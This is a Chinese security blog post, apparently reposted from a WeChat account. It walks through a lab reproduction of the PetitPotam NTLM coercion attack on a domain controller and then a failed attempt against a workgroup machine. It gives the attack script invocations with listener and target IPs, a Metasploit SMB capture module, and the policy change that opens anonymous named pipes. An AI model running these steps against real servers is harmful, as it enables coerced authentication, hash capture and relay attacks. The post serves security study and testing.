petitPotam漏洞在工作组的尝试

admin 2021年12月2日08:39:33评论320 views字数 1054阅读3分30秒阅读模式

前言:这个月Windows出了挺多好玩的漏洞,最近一直没空。只能周末复现了一波,发现petitpotam比较有意思就简单的唠一唠。



1.petitpotam漏洞原理

petitpotam的原理其实很简单,分为以下爱步骤:

  1. 通过匿名管道登陆目标服务器

  2. 通过EfsRpcOpenFileRaw函数,请求恶意UNCpath的文件名

  3. 目标服务器触发SMB请求,把机器账号的net hash指向恶意服务器


首先我们来看一下组策略:

计算机配置Windows 设置安全设置本地策略安全选项

网络访问:可匿名访问的命令管道

工具里默认用的是lsarpc,其实也可以用其他的

petitPotam漏洞在工作组的尝试

其中域控的默认选项是上面那三个据说有的windows server版本也是默认关闭的,这时候就需要域成员的账号密码去访问,当然也可以手动添加,添加后重启就可以匿名登陆了。


运行脚本:

python3 Petitpotam.py 监听服务器IP 目标服务器IP

这时候域控就会以自身机器账号为user通过SMB访问我们的监听服务器。


petitPotam漏洞在工作组的尝试

之后该realy啥的攻击后利用,这边就不提了。

1.在工作组下的尝试

当我看到这个漏洞的时候我就在想在工作组下能否成功,于是我做了一些尝试。

一开始运行这个脚本是失败的,根据报错发现是不支持低版本SMB,我们通过程序打开Windows功能,启用SMB1.0

petitPotam漏洞在工作组的尝试

windows10的网络匿名管道也是默认没有任何东西的,这里我们打开组策略加上netlogon,然后重启

计算机配置Windows 设置安全设置本地策略安全选项网络访问:可匿名访问的命令管道

petitPotam漏洞在工作组的尝试

通过MSF 开启一个SMB-server

use auxiliary/server/capture/smb run

运行脚本:

python3 Petitpotam.py  -pipe netlogon 192.168.157.129 192.168.157.146 

然后发现MSF抓到的是空包

petitPotam漏洞在工作组的尝试

不甘心,wireshark抓一个包看看是什么用户发起的请求:

petitPotam漏洞在工作组的尝试

发现在工作组内竟然不是以机器账户登陆的,而是以anonymous登陆,后来查了一波机器账户这个概念只存在域中/(ㄒoㄒ)/~~


再次尝试主动添加一个机器账号和anonymous账号到本地账户,并赋予密码。然后再次尝试,发现抓的还是空值。。。


写在最后:尝试是失败了,感觉是协议版本的问题,或者工作组的登陆机制的问题,但是还是可以尝试绕一绕,进行一个组合利用。具体的还在实验,大家有啥好的思路也可以私聊我。

本文始发于微信公众号(边界骇客):petitPotam漏洞在工作组的尝试

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年12月2日08:39:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   petitPotam漏洞在工作组的尝试https://cn-sec.com/archives/443381.html

发表评论

匿名网友 填写信息